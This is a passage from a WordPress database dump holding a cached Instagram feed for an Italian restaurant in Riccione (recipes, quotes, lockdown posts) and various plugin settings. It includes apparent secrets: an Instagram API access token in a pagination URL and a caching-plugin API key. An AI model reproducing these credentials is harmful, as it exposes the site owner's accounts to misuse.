mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aj7kaWdkqc0AX-IsUef&oh=5bcfb9a0a302f86857cc406d65944f4f&oe=5F135B09\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":25},\"tags\":[\"restiamo\",\"resistiamo\"],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B-uc_byFLaD\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]},{\"id\":\"2282876163474170581_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aj7kaWdkqc0AX-IsUef&oh=5bcfb9a0a302f86857cc406d65944f4f&oe=5F135B09\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.135.1080.1080a\\/s150x150\\/92176032_106440734253603_8889822398117368405_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Uh86Q1hpInAAX864HZ0&oh=86204640f8b2c1260c31260168f573a3&oe=5F148670\"},\"low_resolution\":{\"width\":320,\"height\":400,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/92176032_106440734253603_8889822398117368405_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Uh86Q1hpInAAX864HZ0&oh=3eacaa015321cf580d517d8d29141c03&oe=5F14ED8A\"},\"standard_resolution\":{\"width\":640,\"height\":800,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/92176032_106440734253603_8889822398117368405_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=Uh86Q1hpInAAX864HZ0&oh=d61f9c80a2d542df8d40e0dca439153d&oe=5F11EEDF\"}},\"created_time\":\"1586360067\",\"caption\":{\"id\":\"17894257723471662\",\"text\":\"Un salto nei ricordi \\nChe tonfo \\ud83d\\udc97\\ud83d\\udc99\",\"created_time\":\"1586360067\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aj7kaWdkqc0AX-IsUef&oh=5bcfb9a0a302f86857cc406d65944f4f&oe=5F135B09\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":true,\"likes\":{\"count\":67},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":1},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B-uZ8aGFaLV\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]},{\"id\":\"2282607208687856785_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aj7kaWdkqc0AX-IsUef&oh=5bcfb9a0a302f86857cc406d65944f4f&oe=5F135B09\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.135.1080.1080a\\/s150x150\\/92177804_243792796769206_3836881798921461208_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=1RYhWmrQwsMAX9DP1qP&oh=e5e73390fb3653e867426e20ecd24b86&oe=5F12D1AA\"},\"low_resolution\":{\"width\":320,\"height\":400,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/p320x320\\/92177804_243792796769206_3836881798921461208_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=1RYhWmrQwsMAX9DP1qP&oh=edb2c5a5efd0dfe6aa3a6577a5667407&oe=5F134150\"},\"standard_resolution\":{\"width\":640,\"height\":800,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/p640x640\\/92177804_243792796769206_3836881798921461208_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=1RYhWmrQwsMAX9DP1qP&oh=ef9ad757f2589386ce693c214a252833&oe=5F132299\"}},\"created_time\":\"1586328005\",\"caption\":{\"id\":\"18137867587049442\",\"text\":\"Il segreto del cambiamento \\n\\u00e9 concentrare tutta la tua energia \\nnon nel combattere il vecchio\\nma nel costruire il nuovo \\nSocrate\",\"created_time\":\"1586328005\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aj7kaWdkqc0AX-IsUef&oh=5bcfb9a0a302f86857cc406d65944f4f&oe=5F135B09\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":54},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":0},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B-tcymbleyR\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]},{\"id\":\"2275617960768154352_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aj7kaWdkqc0AX-IsUef&oh=5bcfb9a0a302f86857cc406d65944f4f&oe=5F135B09\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/91115763_2776857382435684_5944628124557691933_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=s6S3CR5srekAX-orxwp&oh=7a9786a5aea3e4dcf05332723729ebad&oe=5F14689C\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/91115763_2776857382435684_5944628124557691933_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=s6S3CR5srekAX-orxwp&oh=84f7c75741f02220deb27ba054a55e19&oe=5F124F64\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/91115763_2776857382435684_5944628124557691933_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=s6S3CR5srekAX-orxwp&oh=9ef0f2085767dc9fae5aad57a4f94deb&oe=5F13021F\"}},\"created_time\":\"1585494822\",\"caption\":{\"id\":\"17854306570886648\",\"text\":\"Piccola storia illustrata di una calamarata di Gragnano #pastificiodeicampi con rag\\u00f9 di canocchie sgusciate.\\n\\nPrendete le canocchie, sbollentatene una o due a persona e fate indurire in congelatore le altre.poi tagliate ai bordi e sgusciate entrambe, lasciando a quelle crude la testa. Mettete un paio di spicchi d\\u2019aglio in camicia ad imbiondire in olio evo, quindi unire le canocchie crude, fate rosolare poi sfumate con vino bianco. A questo punto unite il pomodoro( polpa o passata secondo i vostri gusti),salate leggermente e fate cuocere. Ripetete lo stesso procedimento con le bucce, aggiungendo per\\u00f3 solo un pochino di pomodoro. Una volta che le bucce hanno preso bene il calore e il pomodoro inizia a rapprendersi, coprite con acqua fredda e fate ridurre del 60\\/70%. Passate le bucce al passa verdura. Ottenendo un brodo sugoso. A questo punto mettete in una padella larga e bassa. Scolatevi la pasta cotta in acqua salata e molto al dente. Saltate o mescolate continuamente ( secondo abilit\\u00e0) aggiungendo, a mano a mano che il sugo rapprende, il brodo di bucce. E buon appetito! @solymar.riccione #quarantena #iorestoacasa @pastificiodeicampi @ariannadeicampi\",\"created_time\":\"1585494822\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aj7kaWdkqc0AX-IsUef&oh=5bcfb9a0a302f86857cc406d65944f4f&oe=5F135B09\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":64},\"tags\":[\"pastificiodeicampi\",\"iorestoacasa\",\"quarantena\"],\"filter\":\"Normal\",\"comments\":{\"count\":7},\"type\":\"carousel\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B-UnnqEFarw\\/\",\"location\":{\"latitude\":44.02460513766300209681503474712371826171875,\"longitude\":12.6317872026820001707392293610610067844390869140625,\"name\":\"Ristorante Sol y Mar - Riccione\",\"id\":872660847},\"attribution\":null,\"users_in_photo\":[],\"carousel_media\":[{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/91115763_2776857382435684_5944628124557691933_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=s6S3CR5srekAX-orxwp&oh=7a9786a5aea3e4dcf05332723729ebad&oe=5F14689C\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/91115763_2776857382435684_5944628124557691933_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=s6S3CR5srekAX-orxwp&oh=84f7c75741f02220deb27ba054a55e19&oe=5F124F64\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/91115763_2776857382435684_5944628124557691933_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=s6S3CR5srekAX-orxwp&oh=9ef0f2085767dc9fae5aad57a4f94deb&oe=5F13021F\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/91095177_506900333336697_2048199982179603193_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=zckRISEY0kUAX82OeKU&oh=741b43ee3bd3abdabd48e8cc73f4b576&oe=5F14FC99\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/91095177_506900333336697_2048199982179603193_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=zckRISEY0kUAX82OeKU&oh=6e06d457e38c58f37e6e514c12a7b2cd&oe=5F12EA09\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/91095177_506900333336697_2048199982179603193_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=zckRISEY0kUAX82OeKU&oh=23309fa00040d91452586060b25c5d2b&oe=5F12C2E0\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/91117915_3999202220221590_1185930446534973530_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=2dghnX6obtIAX_IIS8a&oh=aac41b015e1e874be6be5abd0ea97862&oe=5F123087\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/91117915_3999202220221590_1185930446534973530_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=2dghnX6obtIAX_IIS8a&oh=3c78d3f4ed1cde8892b2821d71908e1d&oe=5F122C3E\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/91117915_3999202220221590_1185930446534973530_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=2dghnX6obtIAX_IIS8a&oh=4783504b50ed7d846f9556f073da5886&oe=5F1183C1\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/91163674_2990128821052921_3290125184549495509_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=DF-5k-jFg5oAX9--Ur8&oh=7cee6f85ec3675a9dfa5166d36b3f6d4&oe=5F150A44\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/91163674_2990128821052921_3290125184549495509_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=DF-5k-jFg5oAX9--Ur8&oh=9f23b7af52f50a6b8cc2bf98d379337d&oe=5F1306F9\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/91163674_2990128821052921_3290125184549495509_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=DF-5k-jFg5oAX9--Ur8&oh=70caceb1f36ec5752821d5127eb66363&oe=5F146886\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/91142826_575041710033526_6922273131958207061_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=tGcU9iYH2vEAX9B5Suq&oh=31f0768bbdee42262228b56210b52e50&oe=5F138EA1\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/91142826_575041710033526_6922273131958207061_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=tGcU9iYH2vEAX9B5Suq&oh=5425fd281425fc02fac10dda893364be&oe=5F14A7B1\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/91142826_575041710033526_6922273131958207061_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=tGcU9iYH2vEAX9B5Suq&oh=ee2c804f6ce4bd5d09394852ce445ac5&oe=5F132AE8\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/91259433_1019621625106080_8662558022646846001_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=u3nEGPDR9F0AX_xsDtU&oh=ceea9d26f10cd83316d7058ea5774fb0&oe=5F131476\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/91259433_1019621625106080_8662558022646846001_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=u3nEGPDR9F0AX_xsDtU&oh=6f077387d5d08602a5572058b8d0551e&oe=5F145C4F\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/91259433_1019621625106080_8662558022646846001_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=u3nEGPDR9F0AX_xsDtU&oh=c622e01599205c3414541ee34b3aeec3&oe=5F14A634\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"videos\":{\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t50.2886-16\\/91208471_144036853702077_4877908862123370098_n.mp4?_nc_ht=scontent.cdninstagram.com&_nc_ohc=g1voB8gE0-oAX_DAl_k&oe=5EEBE7D5&oh=3b4b2c35f424e77ec59173f3d9cc61d0\",\"id\":\"17857750993842456\"},\"low_resolution\":{\"width\":480,\"height\":480,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t50.2886-16\\/91202364_1829600770509872_8875570563928050645_n.mp4?_nc_ht=scontent.cdninstagram.com&_nc_ohc=UO25_ztg3QgAX-Ezz1S&oe=5EEC3D81&oh=d687be7c5770951b5f905485c8148367\",\"id\":\"17857750984842456\"},\"low_bandwidth\":{\"width\":480,\"height\":480,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t50.2886-16\\/91202364_1829600770509872_8875570563928050645_n.mp4?_nc_ht=scontent.cdninstagram.com&_nc_ohc=UO25_ztg3QgAX-Ezz1S&oe=5EEC3D81&oh=d687be7c5770951b5f905485c8148367\",\"id\":\"17857750984842456\"}},\"users_in_photo\":[],\"type\":\"video\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/c0.0.1439.1439a\\/s150x150\\/91111509_552306442081388_3852123610208234969_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=d7bG13qVKXQAX916Z7f&oh=fb8bf4f6fea988dc6aa64c4759bbdaf1&oe=5F133B42\"},\"low_resolution\":{\"width\":320,\"height\":319,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/91111509_552306442081388_3852123610208234969_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=d7bG13qVKXQAX916Z7f&oh=f4c296f723f8bcd0764cb4049c2d6f3a&oe=5F135152\"},\"standard_resolution\":{\"width\":640,\"height\":639,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/91111509_552306442081388_3852123610208234969_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=d7bG13qVKXQAX916Z7f&oh=b7bb31131631e3c7c5b2efc5f8e87a27&oe=5F11FC87\"}},\"users_in_photo\":[],\"type\":\"image\"},{\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/91106870_1840950692696131_4992996380581828558_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=KfhdDBBbBpgAX-xfWb3&oh=08a134c05b106ea589fc6583ae365ee1&oe=5F11D0D0\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/91106870_1840950692696131_4992996380581828558_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=KfhdDBBbBpgAX-xfWb3&oh=3e86523f62bdc2d4a44556eec670bb77&oe=5F11CEB8\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/91106870_1840950692696131_4992996380581828558_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=KfhdDBBbBpgAX-xfWb3&oh=dbb3814d8c562610ac9a9d8071f21863&oe=5F1526CB\"}},\"users_in_photo\":[],\"type\":\"image\"}]},{\"id\":\"2274699227350571278_8526810189\",\"user\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aj7kaWdkqc0AX-IsUef&oh=5bcfb9a0a302f86857cc406d65944f4f&oe=5F135B09\",\"username\":\"solymar.riccione\"},\"images\":{\"thumbnail\":{\"width\":150,\"height\":150,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s150x150\\/90987463_142092187232171_3627820721497455279_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=bPhllEyilxMAX9sysWl&oh=b1853d93d4eda36d59932555c35b3150&oe=5F154395\"},\"low_resolution\":{\"width\":320,\"height\":320,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/e35\\/s320x320\\/90987463_142092187232171_3627820721497455279_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=bPhllEyilxMAX9sysWl&oh=ecbca11b8d79483e7155f64e59329850&oe=5F12B3E5\"},\"standard_resolution\":{\"width\":640,\"height\":640,\"url\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-15\\/sh0.08\\/e35\\/s640x640\\/90987463_142092187232171_3627820721497455279_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=bPhllEyilxMAX9sysWl&oh=76dca3bbaaadeecc48e8ae8898498110&oe=5F1401B4\"}},\"created_time\":\"1585385300\",\"caption\":{\"id\":\"18136273585054124\",\"text\":\"Io credente non praticante ieri mi sono fermata ,mi sono emozionata un emozione unica ad ascoltare con il cuore wueste paole ,le ho ascoltate  da madre stringendo la mano al mio piccolo ,l ho fatto .Mi sono sentita parte di un tutto,in tanti ieri credo si siano sintonizzati su questa Eccezzionale Benedizione ,Discorso  per i non  credenti NESSUNO SI SALVA DA SOLO \\\"non \\u00e9 una predica \\u00e9 oggettivo quindi se vi va leggete,ho tolto delle parti ,ho spostato delle frasi cos\\u00ec  anche chi non crede potr\\u00e0  leggerlo senza \\\"pregiudizi \\\"\\nFitte tenebre si sono addensate sulle nostre  piazze, strade e citt\\u00e0; si sono impadronite delle nostre vite riempiendo tutto di un silenzio assordante e di un vuoto desolante, che paralizza ogni cosa al suo passaggio: si sente nell\\u2019aria, si avverte nei gesti, lo dicono gli sguardi. Ci siamo ritrovati impauriti e smarriti. ...siamo stati presi alla sprovvista da una tempesta inaspettata e furiosa. Ci siamo resi conto di trovarci sulla stessa barca, tutti fragili e disorientati, ma nello stesso tempo importanti e necessari, tutti chiamati a remare insieme, tutti bisognosi di confortarci a vicenda. Su questa barca\\u2026 ci siamo tutti.\\u00a0.....Non \\u00e8 il tempo del tuo giudizio, ma del nostro giudizio: il tempo di scegliere che cosa conta e che cosa passa, di separare ci\\u00f2 che \\u00e8 necessario da ci\\u00f2 che non lo \\u00e8. \\u00c8 il tempo di reimpostare la rotta della vita\\u00a0siamo andati avanti a tutta velocit\\u00e0, sentendoci forti e capaci in tutto. Avidi di guadagno, ci siamo lasciati assorbire dalle cose e frastornare dalla fretta. Non ci siamo fermati davanti ai tuoi richiami, non ci siamo ridestati di fronte a guerre e ingiustizie planetarie, non abbiamo ascoltato il grido dei poveri, e del nostro pianeta gravemente malato. Abbiamo proseguito imperterriti, pensando di rimanere sempre sani in un mondo malato..\\\"Nessuno di salva da solo ..per i credenti un grande atto di fede ,per i non credenti un grande insegnamento (in pratica io resto a casa per proteggere gli altri e me stesso ,siamo tutti sulla stessa barca ,\\u2764Barbara\",\"created_time\":\"1585385300\",\"from\":{\"id\":\"8526810189\",\"full_name\":\"Ristorante sol y mar\",\"profile_picture\":\"https:\\/\\/scontent.cdninstagram.com\\/v\\/t51.2885-19\\/s150x150\\/82381510_191985471870588_1184013790769840128_n.jpg?_nc_ht=scontent.cdninstagram.com&_nc_ohc=aj7kaWdkqc0AX-IsUef&oh=5bcfb9a0a302f86857cc406d65944f4f&oe=5F135B09\",\"username\":\"solymar.riccione\"}},\"user_has_liked\":false,\"likes\":{\"count\":42},\"tags\":[],\"filter\":\"Normal\",\"comments\":{\"count\":4},\"type\":\"image\",\"link\":\"https:\\/\\/www.instagram.com\\/p\\/B-RWuU5FhkO\\/\",\"location\":null,\"attribution\":null,\"users_in_photo\":[]}],\"pagination\":{\"8526810189_users\":\"https:\\/\\/api.instagram.com\\/v1\\/users\\/8526810189\\/media\\/recent?access_token=8526810189.3a81a9f.5549c944046548c889b64e63b36eb18a&count=20&max_id=2274699227350571278_8526810189\"}}','no'),(178432,'!sbi_header_8526810189#8','{\"meta\":{\"code\":400,\"error_type\":\"APINotAllowedError\",\"error_message\":\"This endpoint has been retired\"}}','no'),(178435,'sb_instagram_ajax_status','a:2:{s:6:\"tested\";b:1;s:10:\"successful\";b:1;}','yes'),(179805,'woocommerce_maxmind_geolocation_settings','a:1:{s:15:\"database_prefix\";s:32:\"0RI3VONoeyRAvg88qd83agA2OTaFlxpJ\";}','yes'),(179824,'theme_mods_twentytwenty','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:1:{s:7:\"primary\";i:2;}s:16:\"background_color\";s:3:\"fff\";s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1580469133;s:4:\"data\";a:3:{s:19:\"wp_inactive_widgets\";a:2:{i:0;s:6:\"text-5\";i:1;s:6:\"text-2\";}s:9:\"sidebar-1\";a:5:{i:0;s:25:\"woocommerce_widget_cart-2\";i:1;s:14:\"recent-posts-2\";i:2;s:6:\"text-3\";i:3;s:6:\"text-7\";i:4;s:6:\"text-6\";}s:9:\"sidebar-2\";a:1:{i:0;s:6:\"text-4\";}}}}','yes'),(179829,'shop_isle_install','1580469135','yes'),(180110,'iubenda_activation_data','a:4:{s:14:\"update_version\";i:1;s:13:\"update_notice\";b:0;s:11:\"update_date\";i:1581068545;s:17:\"update_delay_date\";i:0;}','yes'),(180496,'_transient_as_comment_count','O:8:\"stdClass\":7:{s:4:\"spam\";s:2:\"72\";s:14:\"total_comments\";i:72;s:3:\"all\";i:72;s:9:\"moderated\";i:0;s:8:\"approved\";i:0;s:5:\"trash\";i:0;s:12:\"post-trashed\";i:0;}','yes'),(180524,'mailjet_plugin_version','5.2.1','yes'),(180537,'sgpb-dont-delete-data','1','yes'),(180538,'sgpbUnsubscribeColumnFixed','1','yes'),(180539,'SGPBUsageDays','0','yes'),(180540,'SGPBInstallDate','1582190246','yes'),(180541,'SGPBOpenNextTime','1584782246','yes'),(180542,'SGPBMaxOpenCount','80','yes'),(180543,'SG_POPUP_BUILDER_REGISTERED_PLUGINS','[]','yes'),(180544,'SGPB_INACTIVE_EXTENSIONS','inactive','yes'),(180547,'sgpbModifiedRegisteredPluginsPaths1','1','yes'),(180595,'SgpbCounter','a:1:{i:965;i:1737;}','yes'),(182120,'wpseo_ryte','a:2:{s:6:\"status\";i:1;s:10:\"last_fetch\";i:1519813646;}','yes'),(182121,'yoast_migrations_free','a:1:{s:7:\"version\";s:6:\"16.1.1\";}','yes'),(182122,'widget_instagram-feed-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(182123,'action_scheduler_hybrid_store_demarkation','967','yes'),(182124,'schema-ActionScheduler_StoreSchema','3.0.1588198425','yes'),(182125,'schema-ActionScheduler_LoggerSchema','2.0.1588198425','yes'),(182126,'woocommerce_onboarding_opt_in','no','yes'),(182129,'woocommerce_downloads_add_hash_to_filename','yes','yes'),(182131,'woocommerce_onboarding_profile','a:1:{s:9:\"completed\";b:1;}','yes'),(182132,'woocommerce_task_list_hidden','yes','yes'),(182136,'woocommerce_admin_install_timestamp','1589362383','yes'),(182139,'sgpb-unnecessary-scripts-removed-1','1','yes'),(182154,'action_scheduler_lock_async-request-runner','1618881493','yes'),(182178,'WpFc_api_key','282c82adb1e4d68843b4209c66a0ddcc','yes'),(182179,'WpFastestCachePreLoad','{\"homepage\":-1,\"category\":4,\"page\":-1,\"number\":\"4\"}','yes'),(182180,'WpFastestCache','{\"wpFastestCacheStatus\":\"on\",\"wpFastestCachePreload\":\"on\",\"wpFastestCachePreload_homepage\":\"on\",\"wpFastestCachePreload_category\":\"on\",\"wpFastestCachePreload_page\":\"on\",\"wpFastestCachePreload_number\":\"4\",\"wpFastestCacheNewPost\":\"on\",\"wpFastestCacheNewPost_type\":\"all\",\"wpFastestCacheUpdatePost\":\"on\",\"wpFastestCacheUpdatePost_type\":\"post\",\"wpFastestCacheMinifyHtml\":\"on\",\"wpFastestCacheMinifyCss\":\"on\",\"wpFastestCacheCombineCss\":\"on\",\"wpFastestCacheGzip\":\"on\",\"wpFastestCacheLBC\":\"on\",\"wpFastestCacheDisableEmojis\":\"on\",\"wpFastestCacheLanguage\":\"it\"}','yes'),(182181,'wpfc-group','','yes'),(182304,'_transient_woocommerce_reports-transient-version','1612106580','yes'),(182338,'woocommerce_tax_classes','','yes'),(182534,'sbi_usage_tracking_config','a:6:{s:3:\"day\";i:0;s:4